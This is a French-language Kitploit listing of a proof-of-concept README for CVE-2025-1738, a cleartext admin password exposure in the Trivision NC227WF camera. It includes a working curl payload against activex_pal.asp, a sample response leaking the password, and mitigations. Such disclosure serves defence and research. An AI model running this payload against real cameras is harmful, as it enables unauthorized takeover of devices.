Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-1738 — 0day découvrir CVE-2025-1738 | Kitploit
Outils/GitHubGitHub/n0n4m3x41/cve-2025-1738
Sécurité IoTAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationSécurité Matériel et IoTApprentissage et Éducation
GitHubn0n4m3x41/cve-2025-1738

CVE-2025-1738

0day découvrir CVE-2025-1738

Voir le dépôt
3il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-1738 - Caméra Trivision NC227WF PoC

📋 Aperçu

Suite à une divulgation responsable, deux CVE officielles ont été attribuées.

CVECVSS v3.1ScoreCWEType
CVE-2025-1738AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N6.2CWE-598Exposition du mot de passe en clair

🔍 CVE-2025-1738 — Exposition du mot de passe en clair (CWE-598)

Description

Tout utilisateur local peut récupérer le mot de passe administrateur en clair sans nécessiter d'authentification préalable.

  • Vecteur d'attaque : Local (AV:L)
  • Score CVSS : 6.2
  • CWE : CWE-598 (Utilisation de la méthode de requête GET avec des chaînes de requête sensibles)

Charge utile

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp

Exemple de réponse

image
root@kitploit:~
...password=unguessable123!...

Le mot de passe administrateur est renvoyé en clair dans le corps de la réponse.


🛡️ Atténuation

  • Mettez à niveau le firmware si une version corrigée est disponible de la part de Trivision.
  • Isolez la caméra sur un VLAN dédié sans accès externe.
  • Protégez par pare-feu le port de gestion de la caméra des segments réseau non fiables.
  • Modifiez les identifiants par défaut et changez régulièrement les mots de passe.
  • Surveillez les accès inattendus à activex_pal.asp et mblogin.asp.

📚 Références

  • NVD — CVE-2025-1738
  • NVD — CVE-2025-1739

⚖️ Avertissement

Ce dépôt est destiné uniquement à la recherche en sécurité éducative et autorisée. Les auteurs ne sont pas responsables de toute utilisation abusive. Obtenez toujours une autorisation explicite avant de tester un appareil.

Télécharger l’outil